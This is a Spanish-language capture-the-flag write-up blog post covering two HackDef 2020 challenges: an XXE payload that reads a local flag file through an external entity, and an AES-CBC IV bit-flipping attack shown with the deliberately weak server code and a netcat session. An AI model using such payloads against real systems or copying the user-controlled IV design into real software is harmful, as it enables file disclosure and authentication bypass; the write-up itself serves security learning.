<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="xxmeshxx">





<title>HackDef 2020 - Team{ 14$t_H0P3 } | xxmeshxx</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 4.2.0"></head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">xxmeshxx</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/category">Categorias</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">xxmeshxx</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/category">Categorias</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    
    <meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″ />
    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">HackDef 2020 - Team{ 14$t_H0P3 }</h1>
            
                <div class="post-meta">
                    <!--
                        Author: <a itemprop="author" rel="author" href="/">xxmeshxx</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">septiembre 5, 2020&nbsp;&nbsp;22:13:35</a>
                        </span>
                    -->
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/CTF/">CTF</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>Excelente participación del equipo en HackDef 2020 solo saque 2 flags: </p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Exif-300-puntos"><a href="#Exif-300-puntos" class="headerlink" title="Exif 300 puntos"></a>Exif 300 puntos</h3><p>En este reto el sitio web permite subir un XML y procesaba la información regresando un mensaje de que se habia subido exitosamente .</p>
<p><img src="../hackdef2020/exif.png" alt=""></p>
<p>Haciendo un poco de cambios y buscando en el <a href="https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection" target="_blank" rel="noopener">post</a> pude realizar el ataque con el siguiente payload y asi obtener la flag:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=<span class="string">"1.0"</span> encoding=<span class="string">"ISO-8859-1"</span>?&gt;</span><br><span class="line">&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;</span><br><span class="line">&lt;!ENTITY xxe SYSTEM <span class="string">"file:///app/app/flag.txt"</span> &gt;]&gt;</span><br><span class="line">&lt;directorio&gt;</span><br><span class="line">&lt;contacto&gt;</span><br><span class="line">&lt;nombre&gt;&amp;xxe;&lt;/nombre&gt;</span><br><span class="line">&lt;telefono&gt;mypass&lt;/telefono&gt;</span><br><span class="line">&lt;/contacto&gt;</span><br><span class="line">&lt;/directorio&gt;</span><br></pre></td></tr></table></figure>

<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="Flip33r-300-puntos"><a href="#Flip33r-300-puntos" class="headerlink" title="Flip33r 300 puntos"></a>Flip33r 300 puntos</h3><p>Me costo trabajo entender este reto sin embargo gracias al <a href="https://dr3dd.gitlab.io/cryptography/2019/01/10/simple-AES-CBC-bit-flipping-attack/" target="_blank" rel="noopener">post</a> y 3 horas de lectura pude comprender, el codigo es el siguiente: </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><span class="line">import socketserver</span><br><span class="line">import random</span><br><span class="line">import base64</span><br><span class="line">import string</span><br><span class="line">import secrets</span><br><span class="line">import re</span><br><span class="line">from Crypto.Cipher import AES</span><br><span class="line">from Crypto.Util.Padding import pad, unpad</span><br><span class="line"></span><br><span class="line">flipper = <span class="string">''</span><span class="string">'</span></span><br><span class="line"><span class="string">                 DEVELOPED BY FL1PP3R THE DOLPHIN </span></span><br><span class="line"><span class="string">                                   _</span></span><br><span class="line"><span class="string">                               _.-~  )</span></span><br><span class="line"><span class="string">                    _..--~~~~,'</span>   ,-/     _</span><br><span class="line">                 .-<span class="string">'. . . .'</span>   ,-<span class="string">','</span>    ,<span class="string">' )</span></span><br><span class="line"><span class="string">               ,'</span>. . . _   ,--~,-<span class="string">'__..-'</span>  ,<span class="string">'</span></span><br><span class="line"><span class="string">             ,'</span>. . .  (@)<span class="string">' ---~~~~      ,'</span></span><br><span class="line">            /. . . . <span class="string">'~~             ,-'</span></span><br><span class="line">           /. . . . .             ,-<span class="string">'</span></span><br><span class="line"><span class="string">          ; . . . .  - .        ,'</span></span><br><span class="line">         : . . . .       _     /</span><br><span class="line">        . . . . .          `-.:</span><br><span class="line">       . . . ./  - .          )</span><br><span class="line">      .  . . |  _____..---.._/ ____ </span><br><span class="line">~---~~~~----~~~~             ~~</span><br><span class="line"></span><br><span class="line"><span class="string">''</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">with open("flag.txt") as f:</span></span><br><span class="line"><span class="string">    flag = f.readline()</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">def gen_random_key(N):</span></span><br><span class="line"><span class="string">    return '</span><span class="string">'.join(secrets.choice(string.ascii_uppercase + string.digits) for _ in range(N))</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">def delfin_encrypt(iv,key,msg):</span></span><br><span class="line"><span class="string">    cipher = AES.new(bytes(key,"utf-8"),AES.MODE_CBC,bytes(iv,"utf-8"))</span></span><br><span class="line"><span class="string">    los_bytes = cipher.encrypt(pad(bytes(msg,"utf-8"),AES.block_size,style="pkcs7"))</span></span><br><span class="line"><span class="string">    return base64.b64encode(los_bytes)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">def delfin_decrypt(iv,key,msg):</span></span><br><span class="line"><span class="string">    try:</span></span><br><span class="line"><span class="string">        ciphertext = base64.b64decode(msg)</span></span><br><span class="line"><span class="string">        cipher = AES.new(bytes(key,"utf-8"),AES.MODE_CBC,iv)</span></span><br><span class="line"><span class="string">        el_string = unpad(cipher.decrypt(ciphertext),AES.block_size,style="pkcs7")</span></span><br><span class="line"><span class="string">        return str(el_string,"ascii")</span></span><br><span class="line"><span class="string">    except:</span></span><br><span class="line"><span class="string">        return "Padding Incorrecto"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">class Dolphin(socketserver.BaseRequestHandler):</span></span><br><span class="line"><span class="string">    def handle(self):</span></span><br><span class="line"><span class="string">        key = gen_random_key(16)</span></span><br><span class="line"><span class="string">        iv = "\x41"*16</span></span><br><span class="line"><span class="string">        self.request.send(bytes(flipper,"utf-8"))</span></span><br><span class="line"><span class="string">        mensaje = "flipid=" + str(random.choice(range(100)) % 5)</span></span><br><span class="line"><span class="string">        opcion = 0</span></span><br><span class="line"><span class="string">        self.request.send(bytes("Bienvenido humano, tu token de autenticacion es: %s para el %s " % (str(delfin_encrypt(iv,key,mensaje),"utf-8"),mensaje),"utf-8"))</span></span><br><span class="line"><span class="string">        while True:</span></span><br><span class="line"><span class="string">            self.request.send(b"\r\n***Si tienes un token previo usalo para autenticarte a continuacion.\r\n1) Ingresar\r\n2) Salir\r\n")</span></span><br><span class="line"><span class="string">            self.request.send(b"Eleccion: ")</span></span><br><span class="line"><span class="string">            try:</span></span><br><span class="line"><span class="string">                opcion = int(self.request.recv(1024).strip())</span></span><br><span class="line"><span class="string">            except:</span></span><br><span class="line"><span class="string">                self.request.send(b"ERROR, opcion incorrecta")</span></span><br><span class="line"><span class="string">                pass</span></span><br><span class="line"><span class="string">            if opcion == 1:</span></span><br><span class="line"><span class="string">                while True:</span></span><br><span class="line"><span class="string">                    self.request.send(b"Ingresa tu token: ")</span></span><br><span class="line"><span class="string">                    token = self.request.recv(1024).strip()</span></span><br><span class="line"><span class="string">                    self.request.send(b"Ingresa la llave de inicializacion: ")</span></span><br><span class="line"><span class="string">                    llave = self.request.recv(1024).strip()</span></span><br><span class="line"><span class="string">                    if len(llave) &lt; 16:</span></span><br><span class="line"><span class="string">                        self.request.send(b"\r\nLa llave de inicializacion no cumple con el tamano requerido\r\n")</span></span><br><span class="line"><span class="string">                    id = delfin_decrypt(llave[:16],key,token)</span></span><br><span class="line"><span class="string">                    if "flipid=6" in id:</span></span><br><span class="line"><span class="string">                        self.request.send(b"\r\nFelicidades: %b" % bytes(flag,"utf-8"))</span></span><br><span class="line"><span class="string">                        self.request.send(b"\r\n")</span></span><br><span class="line"><span class="string">                        break</span></span><br><span class="line"><span class="string">                    else:</span></span><br><span class="line"><span class="string">                        try:</span></span><br><span class="line"><span class="string">                            self.request.send(b"\r\nEl token pertenece al usuario: %s\r\n" % bytes(id,"utf-8"))</span></span><br><span class="line"><span class="string">                        except:</span></span><br><span class="line"><span class="string">                           self.request.send(b"\r\nHay un problema con tu token\\r\n")</span></span><br><span class="line"><span class="string">                    self.request.send(b"Quieres seguir intentando? (S/N): ")</span></span><br><span class="line"><span class="string">                    s = str(self.request.recv(1024).strip(),"utf-8")</span></span><br><span class="line"><span class="string">                    if s is "S":</span></span><br><span class="line"><span class="string">                        pass</span></span><br><span class="line"><span class="string">                    elif s is "N":</span></span><br><span class="line"><span class="string">                        break</span></span><br><span class="line"><span class="string">                    else:</span></span><br><span class="line"><span class="string">                        break</span></span><br><span class="line"><span class="string">            elif opcion == 2:</span></span><br><span class="line"><span class="string">                self.request.send(b"Adios...")</span></span><br><span class="line"><span class="string">                break</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">if __name__ == "__main__":</span></span><br><span class="line"><span class="string">    HOST, PORT = "0.0.0.0", 3166</span></span><br><span class="line"><span class="string">    server = socketserver.ThreadingTCPServer((HOST, PORT), Dolphin)</span></span><br><span class="line"><span class="string">    server.allow_reuse_address = True</span></span><br><span class="line"><span class="string">    server.serve_forever()</span></span><br></pre></td></tr></table></figure>

<p>El reto pregunta que ¿cual es la debilidad?, para empezar el reto genera tokens aleatoriamente y utiliza AES en modo CBC es decir un modo de cifrado a bloques, normalmente es cifrado necesita un vector inicialización (iv) un mensaje(texto a cifrar) y una llave (en este caso gen_random_key()), para empezar cada que se inicia el programa obtienes 3 cosas:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Token: este es el mensaje cifrado con AES.</span><br><span class="line">Mensaje: este es el mensaje en texto plano.</span><br><span class="line">iv: es una cadena de 16 letras <span class="string">"A"</span></span><br></pre></td></tr></table></figure>

<p>Lo unico que nos falta es la llave….. acorde al post mencionado anteriormente la debilidad de CBC es que utiliza el bloque cifrado para cifrar el texto plano del siguiente bloque y viceversa para el descifrado. Que nos quiere decir esto?, que si conocemos el bloque inicializador podemos hacer XOR en la posición del <code>iv</code> poder realizar lo que queramos es decir nuestra meta es que:</p>
<p>flipid=6 -&gt; para que nos de la flag.</p>
<p>Probando un poco me di cuenta que siempre nos regresaba flipid=2 o flipid=3, ya que se genera aleatoriamente siempre y cuando 100 sea modulo de 5, entonces el 6 tendria que cambiarse a mano (que que un bruteforce no serviria). </p>
<p>El numero que se tiene que cambiar esta en la octava posición, eso quiere decir que un XOR de la octava <code>A</code> de <code>iv</code> en la nos dara un numero diferente…..</p>
<p>Ahora hice un <code>XOR</code> de <code>0x41</code> con <code>0x01</code> para ver si cambiaba y me dio el caracter <code>@</code> sin embargo el id bajo, esto quiere decir que si hago un <code>XOR</code>con los numeros que faltan que en este caso eran 4 por que el programa me daba el flipid=2, entonces al hacer un <code>XOR</code> me sale la letra <code>E</code> entonces:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">(base) mac@x86_64-apple-darwin13 hdef % nc 3.19.72.219 3166</span><br><span class="line"></span><br><span class="line">                 DEVELOPED BY FL1PP3R THE DOLPHIN </span><br><span class="line">                                   _</span><br><span class="line">                               _.-~  )</span><br><span class="line">                    _..--~~~~,<span class="string">'   ,-/     _</span></span><br><span class="line"><span class="string">                 .-'</span>. . . .<span class="string">'   ,-'</span>,<span class="string">'    ,'</span> )</span><br><span class="line">               ,<span class="string">'. . . _   ,--~,-'</span>__..-<span class="string">'  ,'</span></span><br><span class="line">             ,<span class="string">'. . .  (@)'</span> ---~~~~      ,<span class="string">'</span></span><br><span class="line"><span class="string">            /. . . . '</span>~~             ,-<span class="string">'</span></span><br><span class="line"><span class="string">           /. . . . .             ,-'</span></span><br><span class="line">          ; . . . .  - .        ,<span class="string">'</span></span><br><span class="line"><span class="string">         : . . . .       _     /</span></span><br><span class="line"><span class="string">        . . . . .          `-.:</span></span><br><span class="line"><span class="string">       . . . ./  - .          )</span></span><br><span class="line"><span class="string">      .  . . |  _____..---.._/ ____ </span></span><br><span class="line"><span class="string">~---~~~~----~~~~             ~~</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Bienvenido humano, tu token de autenticacion es: klO2bKJbhSqJrFD67mWJaA== para el flipid=2 </span></span><br><span class="line"><span class="string">***Si tienes un token previo usalo para autenticarte a continuacion.</span></span><br><span class="line"><span class="string">1) Ingresar</span></span><br><span class="line"><span class="string">2) Salir</span></span><br><span class="line"><span class="string">Eleccion: 1</span></span><br><span class="line"><span class="string">Ingresa tu token: klO2bKJbhSqJrFD67mWJaA==</span></span><br><span class="line"><span class="string">Ingresa la llave de inicializacion: AAAAAAA@AAAAAAAA</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">El token pertenece al usuario: flipid=3</span></span><br><span class="line"><span class="string">Quieres seguir intentando? (S/N): S</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Ingresa tu token: klO2bKJbhSqJrFD67mWJaA==</span></span><br><span class="line"><span class="string">Ingresa la llave de inicializacion: AAAAAAAEAAAAAAAA</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Felicidades: hackdef&#123;_nunC4_dej3s_3l_c0ntR0l_d3l_IV_a_uN_usuAr1o_qU3_3nt1end3_3L_m0d0_d3_op3r4ci0n_CBC_&#125;</span></span><br></pre></td></tr></table></figure>
        </div>
<!--
        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>xxmeshxx</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="httpd://xxmeshx.github.io/2020/09/05/hackdef2020/">httpd://xxmeshx.github.io/2020/09/05/hackdef2020/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                 -->

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2020/07/26/cybris2020/">Cybrics 2020 - Team{ No_Ones }</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© xxmeshxx | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
